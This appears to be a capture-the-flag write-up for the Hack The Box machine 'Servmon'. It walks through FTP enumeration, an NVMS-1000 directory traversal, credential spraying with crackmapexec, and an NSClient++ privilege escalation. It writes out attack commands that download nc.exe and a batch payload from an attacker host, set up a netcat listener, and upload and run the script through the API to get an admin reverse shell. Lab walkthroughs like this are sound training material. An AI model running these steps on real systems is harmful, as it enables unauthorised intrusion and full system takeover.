Servmon has been released on 11th of April and has been retired on 20th of June. Servmon is an Easy rated machine.
First we see we have anonymous access to FTP, there is a file that mentions there should be a passwords.txt on the desktop of nathan, after the web enumeration we find out there is a directory traversal. We can use this vulnerability to get the passwords.txt from nathans’s his desktop
After finding those passwords we still had to guess to who these belong, we have used crackmapexec for this. it turns out we have credentials for Nadine. we were able to login with ssh and read the user flag.
After some enumeration we found a program called NSClient++ on the machine, this is not a default application, after some research it turns out this application is vulnerable to get system access.
nmap -sC -sV 10.10.10.184
Downloading the file:
File contains there should be a passwords.txt on the desktop of Nathan
NVMS-1000 is vulnerable to Directory Traversal
Since there was a hint on the ftp we should be able to get the passwords.txt from Nathans his Desktop we do this with burp
Now we have some passwords we still don’t know where to use them and to who they belong.
From the FTP we know there should be two users, Nadine and Nathan. lets try them in crackmapexec . in the ftp were 2 users nadine and nathan so i created a user.txt with these two.
crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt
valid credentials found:
Now we have some valid credentials we are able to login with SSH
After some enumeration we see NSClient++ being installed which was also visible on the nmap scan, when we look at the following file we get some credentials. it also shows you cannot login from the outside only from localhost:
on the nmap we could see NSClient++ is running on port 8443:
When we login with the password: ew2x6SsGTxjRwXOT we get an error as expected, since this program only accepts requests from the localhost.
Now we can exploit this program two ways, trough the API or website. i decided to show you a combination of that. for both we need to create ssh tunnel so the machines thinks the request comes from the localhost.
Exploit source: https://www.exploit-db.com/exploits/46802
Creating ssh tunnel:
ssh -L 4433:127.0.0.1:8443 email@example.com
Configure Firefox to use the ssh tunnel
Now we should be able to visit the page with https://127.0.0.1:4433
We also should be able to login now:
First step is:
Login and enable following modules including enable at startup and save configuration - CheckExternalScripts - Scheduler
but since these are already enabled we don’t have to worry about that
Next step is to create a batch file and upload the batch file and Nc.exe (netcat)
In the shell I put the following commands:
python -m SimpleHTTPServer 80
wget http://10.10.14.24/nc.exe -outfile nc.exe
wget http://10.10.14.24/secwalk.bat -outfile secwalk.bat
Setup my listener
nc -lvp 443
Now it is time to exploit
Earlier I said it’s also possible to do this trough the web page or trough the api, I’m gonna show you here the combination of that:
curl -k -i -X PUT -u admin https://127.0.0.1:4432/api/v1/scripts/ext/scripts/secwalk.bat –data-binary @secwalk.bat
curl -k -s -H ‘password: ew2x6SsGTxjRwXOT’ ‘https://127.0.0.1:8443/core/reload’
Now we are gonna run secwalk from the webpage
And we receive our admin shell
Made by S3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.